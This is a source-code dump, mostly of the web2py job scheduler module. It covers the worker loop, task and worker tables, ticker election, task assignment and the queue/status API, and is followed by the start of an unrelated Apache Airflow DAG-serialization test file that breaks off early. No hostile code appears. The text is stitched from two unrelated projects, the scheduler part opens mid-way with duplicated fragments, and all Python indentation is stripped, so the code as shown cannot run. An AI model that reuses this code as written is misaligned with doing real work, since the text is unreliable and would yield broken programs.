def sleep(self):
pass
def loop(self):
"""Main loop, fetching tasks and starting executor's background
processes"""
try:
self.start_heartbeats()
while True and self.have_heartbeat:
logger.debug('looping...')
task = self.pop_task()
if task:
self.empty_runs = 0
self.report_task(task, self.async(task))
else:
self.empty_runs += 1
logger.debug('sleeping...')
if self.max_empty_runs != 0:
logger.debug('empty runs %s/%s',
self.empty_runs, self.max_empty_runs)
if self.empty_runs >= self.max_empty_runs:
logger.info(
'empty runs limit reached, killing myself')
self.die()
self.sleep()
except KeyboardInterrupt:
self.die()
TASK_STATUS = (QUEUED, RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED, EXPIRED)
RUN_STATUS = (RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED)
WORKER_STATUS = (ACTIVE, PICK, DISABLED, TERMINATE, KILL, STOP_TASK)
class TYPE(object):
"""
Validator that checks whether field is valid json and validates its type.
Used for `args` and `vars` of the scheduler_task table
"""
def __init__(self, myclass=list, parse=False):
self.myclass = myclass
self.parse = parse
def __call__(self, value):
from gluon import current
try:
obj = loads(value)
except:
return (value, current.T('invalid json'))
else:
if isinstance(obj, self.myclass):
if self.parse:
return (obj, None)
else:
return (value, None)
else:
return (value, current.T('Not of type: %s') % self.myclass)
class Scheduler(MetaScheduler):
"""Scheduler object
Args:
db: DAL connection where Scheduler will create its tables
tasks(dict): either a dict containing name-->func or None.
If None, functions will be searched in the environment
migrate(bool): turn migration on/off for the Scheduler's tables
worker_name(str): force worker_name to identify each process.
Leave it to None to autoassign a name (hostname#pid)
group_names(list): process tasks belonging to this group
defaults to ['main'] if nothing gets passed
heartbeat(int): how many seconds the worker sleeps between one
execution and the following one. Indirectly sets how many seconds
will pass between checks for new tasks
max_empty_runs(int): how many loops are allowed to pass without
processing any tasks before exiting the process. 0 to keep always
the process alive
discard_results(bool): the Scheduler stores execution details in the
scheduler_run table. By default, details are kept only when there is
a result. Setting this to True discards results even for tasks that
return something
utc_time(bool): do all datetime calculations assuming UTC as the
timezone. Remember to pass `start_time` and `stop_time` to tasks
accordingly
"""
def __init__(self, db, tasks=None, migrate=True,
worker_name=None, group_names=None, heartbeat=HEARTBEAT,
max_empty_runs=0, discard_results=False, utc_time=False):
MetaScheduler.__init__(self)
self.db = db
self.db_thread = None
self.tasks = tasks
self.group_names = group_names or ['main']
self.heartbeat = heartbeat
self.worker_name = worker_name or IDENTIFIER
self.max_empty_runs = max_empty_runs
self.discard_results = discard_results
self.is_a_ticker = False
self.do_assign_tasks = False
self.greedy = False
self.utc_time = utc_time
self.w_stats = Storage(
dict(
status=RUNNING,
sleep=heartbeat,
total=0,
errors=0,
empty_runs=0,
queue=0,
distribution=None,
workers=0)
) # dict holding statistics
from gluon import current
current._scheduler = self
self.define_tables(db, migrate=migrate)
def __get_migrate(self, tablename, migrate=True):
if migrate is False:
return False
elif migrate is True:
return True
elif isinstance(migrate, str):
return "%s%s.table" % (migrate, tablename)
return True
def now(self):
"""Shortcut that fetches current time based on UTC preferences"""
return self.utc_time and datetime.datetime.utcnow() or datetime.datetime.now()
def set_requirements(self, scheduler_task):
"""Called to set defaults for lazy_tables connections"""
from gluon import current
if hasattr(current, 'request'):
scheduler_task.application_name.default = '%s/%s' % (
current.request.application, current.request.controller
)
def define_tables(self, db, migrate):
"""Defines Scheduler tables structure"""
from pydal.base import DEFAULT
logger.debug('defining tables (migrate=%s)', migrate)
now = self.now
db.define_table(
'scheduler_task',
Field('application_name', requires=IS_NOT_EMPTY(),
default=None, writable=False),
Field('task_name', default=None),
Field('group_name', default='main'),
Field('status', requires=IS_IN_SET(TASK_STATUS),
default=QUEUED, writable=False),
Field('function_name',
requires=IS_IN_SET(sorted(self.tasks.keys()))
if self.tasks else DEFAULT),
Field('uuid', length=255,
requires=IS_NOT_IN_DB(db, 'scheduler_task.uuid'),
unique=True, default=web2py_uuid),
Field('args', 'text', default='[]', requires=TYPE(list)),
Field('vars', 'text', default='{}', requires=TYPE(dict)),
Field('enabled', 'boolean', default=True),
Field('start_time', 'datetime', default=now,
requires=IS_DATETIME()),
Field('next_run_time', 'datetime', default=now),
Field('stop_time', 'datetime'),
Field('repeats', 'integer', default=1, comment="0=unlimited",
requires=IS_INT_IN_RANGE(0, None)),
Field('retry_failed', 'integer', default=0, comment="-1=unlimited",
requires=IS_INT_IN_RANGE(-1, None)),
Field('period', 'integer', default=60, comment='seconds',
requires=IS_INT_IN_RANGE(0, None)),
Field('prevent_drift', 'boolean', default=False,
comment='Cron-like start_times between runs'),
Field('timeout', 'integer', default=60, comment='seconds',
requires=IS_INT_IN_RANGE(1, None)),
Field('sync_output', 'integer', default=0,
comment="update output every n sec: 0=never",
requires=IS_INT_IN_RANGE(0, None)),
Field('times_run', 'integer', default=0, writable=False),
Field('times_failed', 'integer', default=0, writable=False),
Field('last_run_time', 'datetime', writable=False, readable=False),
Field('assigned_worker_name', default='', writable=False),
on_define=self.set_requirements,
migrate=self.__get_migrate('scheduler_task', migrate),
format='%(task_name)s')
db.define_table(
'scheduler_run',
Field('task_id', 'reference scheduler_task'),
Field('status', requires=IS_IN_SET(RUN_STATUS)),
Field('start_time', 'datetime'),
Field('stop_time', 'datetime'),
Field('run_output', 'text'),
Field('run_result', 'text'),
Field('traceback', 'text'),
Field('worker_name', default=self.worker_name),
migrate=self.__get_migrate('scheduler_run', migrate)
)
db.define_table(
'scheduler_worker',
Field('worker_name', length=255, unique=True),
Field('first_heartbeat', 'datetime'),
Field('last_heartbeat', 'datetime'),
Field('status', requires=IS_IN_SET(WORKER_STATUS)),
Field('is_ticker', 'boolean', default=False, writable=False),
Field('group_names', 'list:string', default=self.group_names),
Field('worker_stats', 'json'),
migrate=self.__get_migrate('scheduler_worker', migrate)
)
db.define_table(
'scheduler_task_deps',
Field('job_name', default='job_0'),
Field('task_parent', 'integer',
requires=IS_IN_DB(db, 'scheduler_task.id',
'%(task_name)s')
),
Field('task_child', 'reference scheduler_task'),
Field('can_visit', 'boolean', default=False),
migrate=self.__get_migrate('scheduler_task_deps', migrate)
)
if migrate is not False:
db.commit()
def loop(self, worker_name=None):
"""Main loop
This works basically as a neverending loop that:
- checks if the worker is ready to process tasks (is not DISABLED)
- pops a task from the queue
- if there is a task:
- spawns the executor background process
- waits for the process to be finished
- sleeps `heartbeat` seconds
- if there is not a task:
- checks for max_empty_runs
- sleeps `heartbeat` seconds
"""
signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
try:
self.start_heartbeats()
while True and self.have_heartbeat:
if self.w_stats.status == DISABLED:
logger.debug('Someone stopped me, sleeping until better'
' times come (%s)', self.w_stats.sleep)
self.sleep()
continue
logger.debug('looping...')
task = self.wrapped_pop_task()
if task:
self.w_stats.empty_runs = 0
self.w_stats.status = RUNNING
self.w_stats.total += 1
self.wrapped_report_task(task, self.async(task))
if not self.w_stats.status == DISABLED:
self.w_stats.status = ACTIVE
else:
self.w_stats.empty_runs += 1
logger.debug('sleeping...')
if self.max_empty_runs != 0:
logger.debug('empty runs %s/%s',
self.w_stats.empty_runs, self.max_empty_runs)
if self.w_stats.empty_runs >= self.max_empty_runs:
logger.info(
'empty runs limit reached, killing myself')
self.die()
self.sleep()
except (KeyboardInterrupt, SystemExit):
logger.info('caught')
self.die()
def wrapped_assign_tasks(self, db):
"""Commodity function to call `assign_tasks` and trap exceptions
If an exception is raised, assume it happened because of database
contention and retries `assign_task` after 0.5 seconds
"""
logger.debug('Assigning tasks...')
db.commit() # db.commit() only for Mysql
x = 0
while x < 10:
try:
self.assign_tasks(db)
db.commit()
logger.debug('Tasks assigned...')
break
except:
self.w_stats.errors += 1
db.rollback()
logger.error('TICKER: error assigning tasks (%s)', x)
x += 1
time.sleep(0.5)
def wrapped_pop_task(self):
"""Commodity function to call `pop_task` and trap exceptions
If an exception is raised, assume it happened because of database
contention and retries `pop_task` after 0.5 seconds
"""
db = self.db
db.commit() # another nifty db.commit() only for Mysql
x = 0
while x < 10:
try:
rtn = self.pop_task(db)
return rtn
except:
self.w_stats.errors += 1
db.rollback()
logger.error(' error popping tasks')
x += 1
time.sleep(0.5)
def pop_task(self, db):
"""Grabs a task ready to be executed from the queue"""
now = self.now()
st = self.db.scheduler_task
if self.is_a_ticker and self.do_assign_tasks:
#I'm a ticker, and 5 loops passed without reassigning tasks,
#let's do that and loop again
self.wrapped_assign_tasks(db)
return None
# ready to process something
grabbed = db(
(st.assigned_worker_name == self.worker_name) &
(st.status == ASSIGNED)
)
task = grabbed.select(limitby=(0, 1), orderby=st.next_run_time).first()
if task:
task.update_record(status=RUNNING, last_run_time=now)
# no one will touch my task!
db.commit()
logger.debug(' work to do %s', task.id)
else:
if self.is_a_ticker and self.greedy:
# there are other tasks ready to be assigned
logger.info('TICKER: greedy loop')
self.wrapped_assign_tasks(db)
else:
logger.info('nothing to do')
return None
times_run = task.times_run + 1
if not task.prevent_drift:
next_run_time = task.last_run_time + datetime.timedelta(
seconds=task.period
)
else:
next_run_time = task.start_time + datetime.timedelta(
seconds=task.period * times_run
)
if times_run < task.repeats or task.repeats == 0:
# need to run (repeating task)
run_again = True
else:
# no need to run again
run_again = False
run_id = 0
while True and not self.discard_results:
logger.debug(' new scheduler_run record')
try:
run_id = db.scheduler_run.insert(
task_id=task.id,
status=RUNNING,
start_time=now,
worker_name=self.worker_name)
db.commit()
break
except:
time.sleep(0.5)
db.rollback()
logger.info('new task %(id)s "%(task_name)s"'
' %(application_name)s.%(function_name)s' % task)
return Task(
app=task.application_name,
function=task.function_name,
timeout=task.timeout,
args=task.args, # in json
vars=task.vars, # in json
task_id=task.id,
run_id=run_id,
run_again=run_again,
next_run_time=next_run_time,
times_run=times_run,
stop_time=task.stop_time,
retry_failed=task.retry_failed,
times_failed=task.times_failed,
sync_output=task.sync_output,
uuid=task.uuid)
def wrapped_report_task(self, task, task_report):
"""Commodity function to call `report_task` and trap exceptions
If an exception is raised, assume it happened because of database
contention and retries `pop_task` after 0.5 seconds
"""
db = self.db
while True:
try:
self.report_task(task, task_report)
db.commit()
break
except:
self.w_stats.errors += 1
db.rollback()
logger.error(' error storing result')
time.sleep(0.5)
def report_task(self, task, task_report):
"""Takes care of storing the result according to preferences
and deals with logic for repeating tasks"""
db = self.db
now = self.now()
st = db.scheduler_task
sr = db.scheduler_run
if not self.discard_results:
if task_report.result != 'null' or task_report.tb:
# result is the string 'null' when the task completed but returned
# nothing; when the task was stopped, result is None (NoneType), so
# the STOPPED "run" is recorded anyway
logger.debug(' recording task report in db (%s)',
task_report.status)
db(sr.id == task.run_id).update(
status=task_report.status,
stop_time=now,
run_result=task_report.result,
run_output=task_report.output,
traceback=task_report.tb)
else:
logger.debug(' deleting task report in db because of no result')
db(sr.id == task.run_id).delete()
# if there is a stop_time and the following run would exceed it
is_expired = (task.stop_time
and task.next_run_time > task.stop_time
and True or False)
status = (task.run_again and is_expired and EXPIRED
or task.run_again and not is_expired
and QUEUED or COMPLETED)
if task_report.status == COMPLETED:
d = dict(status=status,
next_run_time=task.next_run_time,
times_run=task.times_run,
times_failed=0
)
db(st.id == task.task_id).update(**d)
if status == COMPLETED:
self.update_dependencies(db, task.task_id)
else:
st_mapping = {'FAILED': 'FAILED',
'TIMEOUT': 'TIMEOUT',
'STOPPED': 'QUEUED'}[task_report.status]
status = (task.retry_failed
and task.times_failed < task.retry_failed
and QUEUED or task.retry_failed == -1
and QUEUED or st_mapping)
db(st.id == task.task_id).update(
times_failed=db.scheduler_task.times_failed + 1,
next_run_time=task.next_run_time,
status=status
)
logger.info('task completed (%s)', task_report.status)
def update_dependencies(self, db, task_id):
db(db.scheduler_task_deps.task_child == task_id).update(can_visit=True)
def adj_hibernation(self):
"""Used to increase the "sleep" interval for DISABLED workers"""
if self.w_stats.status == DISABLED:
wk_st = self.w_stats.sleep
hibernation = wk_st + HEARTBEAT if wk_st < MAXHIBERNATION else MAXHIBERNATION
self.w_stats.sleep = hibernation
def send_heartbeat(self, counter):
"""This function is vital for proper coordination among available
workers.
It:
- sends the heartbeat
- elects a ticker among available workers (the only process that
effectively dispatches tasks to workers)
- deals with workers' statuses
- does "housecleaning" for dead workers
- triggers tasks assignment to workers
"""
if not self.db_thread:
logger.debug('thread building own DAL object')
self.db_thread = DAL(
self.db._uri, folder=self.db._adapter.folder)
self.define_tables(self.db_thread, migrate=False)
try:
db = self.db_thread
sw, st = db.scheduler_worker, db.scheduler_task
now = self.now()
# record heartbeat
mybackedstatus = db(sw.worker_name == self.worker_name).select().first()
if not mybackedstatus:
sw.insert(status=ACTIVE, worker_name=self.worker_name,
first_heartbeat=now, last_heartbeat=now,
group_names=self.group_names,
worker_stats=self.w_stats)
self.w_stats.status = ACTIVE
self.w_stats.sleep = self.heartbeat
mybackedstatus = ACTIVE
else:
mybackedstatus = mybackedstatus.status
if mybackedstatus == DISABLED:
# keep sleeping
self.w_stats.status = DISABLED
logger.debug('........recording heartbeat (%s)',
self.w_stats.status)
db(sw.worker_name == self.worker_name).update(
last_heartbeat=now,
worker_stats=self.w_stats)
elif mybackedstatus == TERMINATE:
self.w_stats.status = TERMINATE
logger.debug("Waiting to terminate the current task")
self.give_up()
elif mybackedstatus == KILL:
self.w_stats.status = KILL
self.die()
return
else:
if mybackedstatus == STOP_TASK:
logger.info('Asked to kill the current task')
self.terminate_process()
logger.debug('........recording heartbeat (%s)',
self.w_stats.status)
db(sw.worker_name == self.worker_name).update(
last_heartbeat=now, status=ACTIVE,
worker_stats=self.w_stats)
self.w_stats.sleep = self.heartbeat # re-activating the process
if self.w_stats.status != RUNNING:
self.w_stats.status = ACTIVE
self.do_assign_tasks = False
if counter % 5 == 0 or mybackedstatus == PICK:
try:
# delete dead workers
expiration = now - datetime.timedelta(
seconds=self.heartbeat * 3)
departure = now - datetime.timedelta(
seconds=self.heartbeat * 3 * 15)
logger.debug(
' freeing workers that have not sent heartbeat')
dead_workers = db(
((sw.last_heartbeat < expiration) & (sw.status == ACTIVE)) |
((sw.last_heartbeat < departure) & (sw.status != ACTIVE))
)
dead_workers_name = dead_workers._select(sw.worker_name)
db(
(st.assigned_worker_name.belongs(dead_workers_name)) &
(st.status == RUNNING)
).update(assigned_worker_name='', status=QUEUED)
dead_workers.delete()
try:
self.is_a_ticker = self.being_a_ticker()
except:
logger.error('Error coordinating TICKER')
if self.w_stats.status == ACTIVE:
self.do_assign_tasks = True
except:
logger.error('Error cleaning up')
db.commit()
except:
logger.error('Error retrieving status')
db.rollback()
self.adj_hibernation()
self.sleep()
def being_a_ticker(self):
"""Elects a TICKER process that assigns tasks to available workers.
Does its best to elect a worker that is not busy processing other tasks
to allow a proper distribution of tasks among all active workers ASAP
"""
db = self.db_thread
sw = db.scheduler_worker
my_name = self.worker_name
all_active = db(
(sw.worker_name != my_name) & (sw.status == ACTIVE)
).select(sw.is_ticker, sw.worker_name)
ticker = all_active.find(lambda row: row.is_ticker is True).first()
not_busy = self.w_stats.status == ACTIVE
if not ticker:
# if no other tickers are around
if not_busy:
# only if I'm not busy
db(sw.worker_name == my_name).update(is_ticker=True)
db(sw.worker_name != my_name).update(is_ticker=False)
logger.info("TICKER: I'm a ticker")
else:
# I'm busy
if len(all_active) >= 1:
# so I'll "downgrade" myself to a "poor worker"
db(sw.worker_name == my_name).update(is_ticker=False)
else:
not_busy = True
db.commit()
return not_busy
else:
logger.info(
"%s is a ticker, I'm a poor worker" % ticker.worker_name)
return False
def assign_tasks(self, db):
"""Assigns task to workers, that can then pop them from the queue
Deals with group_name(s) logic, in order to assign linearly tasks
to available workers for those groups
"""
sw, st, sd = db.scheduler_worker, db.scheduler_task, db.scheduler_task_deps
now = self.now()
all_workers = db(sw.status == ACTIVE).select()
# build workers as dict of groups
wkgroups = {}
for w in all_workers:
if w.worker_stats['status'] == 'RUNNING':
continue
group_names = w.group_names
for gname in group_names:
if gname not in wkgroups:
wkgroups[gname] = dict(
workers=[{'name': w.worker_name, 'c': 0}])
else:
wkgroups[gname]['workers'].append(
{'name': w.worker_name, 'c': 0})
# mark as EXPIRED any queued tasks whose stop_time passed between "runs"
# (i.e. while the scheduler was turned off): they weren't expired then,
# but they are now
db(
(st.status.belongs((QUEUED, ASSIGNED))) &
(st.stop_time < now)
).update(status=EXPIRED)
# calculate dependencies
deps_with_no_deps = db(
(sd.can_visit == False) &
(~sd.task_child.belongs(
db(sd.can_visit == False)._select(sd.task_parent)
)
)
)._select(sd.task_child)
no_deps = db(
(st.status.belongs((QUEUED, ASSIGNED))) &
(
(sd.id == None) | (st.id.belongs(deps_with_no_deps))
)
)._select(st.id, distinct=True, left=sd.on(
(st.id == sd.task_parent) &
(sd.can_visit == False)
)
)
all_available = db(
(st.status.belongs((QUEUED, ASSIGNED))) &
((st.times_run < st.repeats) | (st.repeats == 0)) &
(st.start_time <= now) &
((st.stop_time == None) | (st.stop_time > now)) &
(st.next_run_time <= now) &
(st.enabled == True) &
(st.id.belongs(no_deps))
)
limit = len(all_workers) * (50 / (len(wkgroups) or 1))
# if there is a multitude of tasks, figure out a maximum number of
# tasks per worker. This could be tuned further with some added
# intelligence (like estimating how many tasks a worker will complete
# before the ticker reassigns them), but the gain is quite small.
# 50 is a sweet spot also for fast tasks, with sane heartbeat values.
# NB: the ticker reassigns tasks every 5 cycles, so if a worker
# completes its 50 tasks in less than heartbeat*5 seconds,
# it won't pick new tasks until heartbeat*5 seconds pass.
# If a worker is currently busy with a long task, its tasks need to
# be reassigned to other workers.
# This shuffles things up a bit, in order to give each task an equal
# chance to be executed.
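# For instance (illustrative numbers only): with 4 active workers spread
# over 2 groups, limit = 4 * (50 / 2) = 100 tasks fetched per group on
# each assignment cycle.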
# let's freeze it up
db.commit()
x = 0
for group in wkgroups.keys():
tasks = all_available(st.group_name == group).select(
limitby=(0, limit), orderby = st.next_run_time)
# let's break up the queue evenly among workers
for task in tasks:
x += 1
gname = task.group_name
ws = wkgroups.get(gname)
if ws:
counter = 0
myw = 0
for i, w in enumerate(ws['workers']):
if w['c'] < counter:
myw = i
counter = w['c']
assigned_wn = wkgroups[gname]['workers'][myw]['name']
d = dict(
status=ASSIGNED,
assigned_worker_name=assigned_wn
)
if not task.task_name:
d['task_name'] = task.function_name
db(
(st.id == task.id) &
(st.status.belongs((QUEUED, ASSIGNED)))
).update(**d)
wkgroups[gname]['workers'][myw]['c'] += 1
db.commit()
# I didn't report tasks but I'm working nonetheless!!!!
if x > 0:
self.w_stats.empty_runs = 0
self.w_stats.queue = x
self.w_stats.distribution = wkgroups
self.w_stats.workers = len(all_workers)
# I'll be greedy only if tasks assigned are equal to the limit
# (meaning there could be others ready to be assigned)
self.greedy = x >= limit
logger.info('TICKER: workers are %s', len(all_workers))
logger.info('TICKER: tasks are %s', x)
def sleep(self):
"""Calculates the number of seconds to sleep according to worker's
status and `heartbeat` parameter"""
time.sleep(self.w_stats.sleep)
# should only sleep until next available task
def set_worker_status(self, group_names=None, action=ACTIVE,
exclude=None, limit=None, worker_name=None):
"""Internal function to set worker's status"""
ws = self.db.scheduler_worker
if not group_names:
group_names = self.group_names
elif isinstance(group_names, str):
group_names = [group_names]
if worker_name:
self.db(ws.worker_name == worker_name).update(status=action)
return
exclusion = exclude and exclude.append(action) or [action]
if not limit:
for group in group_names:
self.db(
(ws.group_names.contains(group)) &
(~ws.status.belongs(exclusion))
).update(status=action)
else:
for group in group_names:
workers = self.db((ws.group_names.contains(group)) &
(~ws.status.belongs(exclusion))
)._select(ws.id, limitby=(0, limit))
self.db(ws.id.belongs(workers)).update(status=action)
def disable(self, group_names=None, limit=None, worker_name=None):
"""Sets DISABLED on the workers processing `group_names` tasks.
A DISABLED worker will be kept alive but it won't be able to process
any waiting tasks, essentially putting it to sleep.
By default, all group_names of the Scheduler's instantiation are selected"""
self.set_worker_status(
group_names=group_names,
action=DISABLED,
exclude=[DISABLED, KILL, TERMINATE],
limit=limit)
def resume(self, group_names=None, limit=None, worker_name=None):
"""Wakes a worker up (it will be able to process queued tasks)"""
self.set_worker_status(
group_names=group_names,
action=ACTIVE,
exclude=[KILL, TERMINATE],
limit=limit)
def terminate(self, group_names=None, limit=None, worker_name=None):
"""Sets TERMINATE as worker status. The worker will wait for any
currently running tasks to be executed and then it will exit gracefully
"""
self.set_worker_status(
group_names=group_names,
action=TERMINATE,
exclude=[KILL],
limit=limit)
def kill(self, group_names=None, limit=None, worker_name=None):
"""Sets KILL as worker status. The worker will be killed even if it's
processing a task."""
self.set_worker_status(
group_names=group_names,
action=KILL,
limit=limit)
def queue_task(self, function, pargs=[], pvars={}, **kwargs):
"""
Queues a task. This takes care of validating all
parameters
Args:
function: the function (anything callable with a __name__)
pargs: "raw" args to be passed to the function. Automatically
jsonified.
pvars: "raw" kwargs to be passed to the function. Automatically
jsonified
kwargs: all the parameters available (basically, every
`scheduler_task` column). If args and vars are here, they should
be jsonified already, and they will override pargs and pvars
Returns:
a dict just as a normal validate_and_insert(), plus a uuid key
holding the uuid of the queued task. If validation is not passed
(i.e. some parameters are invalid), both id and uuid will be None,
and you'll get an "error" dict holding the errors found.
"""
if hasattr(function, '__name__'):
function = function.__name__
targs = 'args' in kwargs and kwargs.pop('args') or dumps(pargs)
tvars = 'vars' in kwargs and kwargs.pop('vars') or dumps(pvars)
tuuid = 'uuid' in kwargs and kwargs.pop('uuid') or web2py_uuid()
tname = 'task_name' in kwargs and kwargs.pop('task_name') or function
immediate = 'immediate' in kwargs and kwargs.pop('immediate') or None
rtn = self.db.scheduler_task.validate_and_insert(
function_name=function,
task_name=tname,
args=targs,
vars=tvars,
uuid=tuuid,
**kwargs)
if not rtn.errors:
rtn.uuid = tuuid
if immediate:
self.db(
(self.db.scheduler_worker.is_ticker == True)
).update(status=PICK)
else:
rtn.uuid = None
return rtn
def task_status(self, ref, output=False):
"""
Retrieves task status and optionally the result of the task
Args:
ref: can be
- an integer : lookup will be done by scheduler_task.id
- a string : lookup will be done by scheduler_task.uuid
- a `Query` : lookup as you wish, e.g. ::
db.scheduler_task.task_name == 'test1'
output(bool): if `True`, fetch also the scheduler_run record
Returns:
a single Row object, for the last queued task.
If output == True, returns also the last scheduler_run record.
The scheduler_run record is fetched by a left join, so it can
have all fields == None
"""
from pydal.objects import Query
sr, st = self.db.scheduler_run, self.db.scheduler_task
if isinstance(ref, (int, long)):
q = st.id == ref
elif isinstance(ref, str):
q = st.uuid == ref
elif isinstance(ref, Query):
q = ref
else:
raise SyntaxError(
"You can retrieve results only by id, uuid or Query")
fields = [st.ALL]
left = False
orderby = ~st.id
if output:
fields = st.ALL, sr.ALL
left = sr.on(sr.task_id == st.id)
orderby = ~st.id | ~sr.id
row = self.db(q).select(
*fields,
**dict(orderby=orderby,
left=left,
limitby=(0, 1))
).first()
if row and output:
row.result = row.scheduler_run.run_result and \
loads(row.scheduler_run.run_result,
object_hook=_decode_dict) or None
return row
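# Usage sketch for task_status (illustrative):
#   row = scheduler.task_status('a-task-uuid')               # lookup by uuid
#   row = scheduler.task_status(db.scheduler_task.task_name == 'test1',
#                               output=True)                 # lookup by Query
#   # with output=True the decoded run result is exposed as row.result
#   if row:
#       print row.scheduler_task.status, row.result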
def stop_task(self, ref):
"""Shortcut for task termination.
If the task is RUNNING it will terminate it, meaning that status
will be set as FAILED.
If the task is QUEUED, its stop_time will be set to "now",
the enabled flag will be set to False, and the status to STOPPED
Args:
ref: can be
- an integer : lookup will be done by scheduler_task.id
- a string : lookup will be done by scheduler_task.uuid
Returns:
- 1 if task was stopped (meaning an update has been done)
- None if task was not found, or if task was not RUNNING or QUEUED
Note:
Experimental
"""
st, sw = self.db.scheduler_task, self.db.scheduler_worker
if isinstance(ref, (int, long)):
q = st.id == ref
elif isinstance(ref, str):
q = st.uuid == ref
else:
raise SyntaxError(
"You can retrieve results only by id or uuid")
task = self.db(q).select(st.id, st.status, st.assigned_worker_name)
task = task.first()
rtn = None
if not task:
return rtn
if task.status == 'RUNNING':
q = sw.worker_name == task.assigned_worker_name
rtn = self.db(q).update(status=STOP_TASK)
elif task.status == 'QUEUED':
rtn = self.db(q).update(
stop_time=self.now(),
enabled=False,
status=STOPPED)
return rtn
def get_workers(self, only_ticker=False):
""" Returns a dict holding `worker_name : {**columns}`
representing all "registered" workers
only_ticker returns only the workers running as a TICKER,
if there are any
"""
db = self.db
if only_ticker:
workers = db(db.scheduler_worker.is_ticker == True).select()
else:
workers = db(db.scheduler_worker.id > 0).select()
all_workers = {}
for row in workers:
all_workers[row.worker_name] = Storage(
status=row.status,
first_heartbeat=row.first_heartbeat,
last_heartbeat=row.last_heartbeat,
group_names=row.group_names,
is_ticker=row.is_ticker,
worker_stats=row.worker_stats
)
return all_workers
def main():
"""
allows running a worker without going through ``python web2py.py ...`` by simply::
python gluon/scheduler.py
"""
parser = optparse.OptionParser()
parser.add_option(
"-w", "--worker_name", dest="worker_name", default=None,
help="start a worker with name")
parser.add_option(
"-b", "--heartbeat", dest="heartbeat", default=10,
type='int', help="heartbeat time in seconds (default 10)")
parser.add_option(
"-L", "--logger_level", dest="logger_level",
default=30,
type='int',
help="set debug output level (0-100, 0 means all, 100 means none;default is 30)")
parser.add_option("-E", "--empty-runs",
dest="max_empty_runs",
type='int',
default=0,
help="max loops with no grabbed tasks permitted (0 for never check)")
parser.add_option(
"-g", "--group_names", dest="group_names",
default='main',
help="comma separated list of groups to be picked by the worker")
parser.add_option(
"-f", "--db_folder", dest="db_folder",
default='/Users/mdipierro/web2py/applications/scheduler/databases',
help="location of the dal database folder")
parser.add_option(
"-u", "--db_uri", dest="db_uri",
default='sqlite://storage.sqlite',
help="database URI string (web2py DAL syntax)")
parser.add_option(
"-t", "--tasks", dest="tasks", default=None,
help="file containing task files, must define" +
"tasks = {'task_name':(lambda: 'output')} or similar set of tasks")
parser.add_option(
"-U", "--utc-time", dest="utc_time", default=False,
help="work with UTC timestamps"
)
(options, args) = parser.parse_args()
if not options.tasks or not options.db_uri:
print USAGE
if options.tasks:
path, filename = os.path.split(options.tasks)
if filename.endswith('.py'):
filename = filename[:-3]
sys.path.append(path)
print 'importing tasks...'
tasks = __import__(filename, globals(), locals(), [], -1).tasks
print 'tasks found: ' + ', '.join(tasks.keys())
else:
tasks = {}
group_names = [x.strip() for x in options.group_names.split(',')]
logging.getLogger().setLevel(options.logger_level)
print 'groups for this worker: ' + ', '.join(group_names)
print 'connecting to database in folder: ' + (options.db_folder or './')
print 'using URI: ' + options.db_uri
db = DAL(options.db_uri, folder=options.db_folder)
print 'instantiating scheduler...'
scheduler = Scheduler(db=db,
worker_name=options.worker_name,
tasks=tasks,
migrate=True,
group_names=group_names,
heartbeat=options.heartbeat,
max_empty_runs=options.max_empty_runs,
utc_time=options.utc_time)
signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
print 'starting main worker loop...'
scheduler.loop()
if __name__ == '__main__':
main()
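# Example standalone invocation (paths, URI and group names are illustrative):
#   python gluon/scheduler.py -u sqlite://storage.sqlite \
#       -f applications/myapp/databases -t tasks.py -g main,fast -b 5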
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta
from glob import glob
from unittest import mock
from dateutil.relativedelta import FR, relativedelta
from parameterized import parameterized
from airflow.hooks.base_hook import BaseHook
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.operators.bash import BashOperator
from airflow.operators.subdag_operator import SubDagOperator
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {
"__type": "timedelta",
"__var": 300.0
}
}
},
"start_date": 1564617600.0,
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"bash_command": "echo {{ task.task_id }}",
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [
"can_dag_read",
"can_dag_edit"
]
}
}
}
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
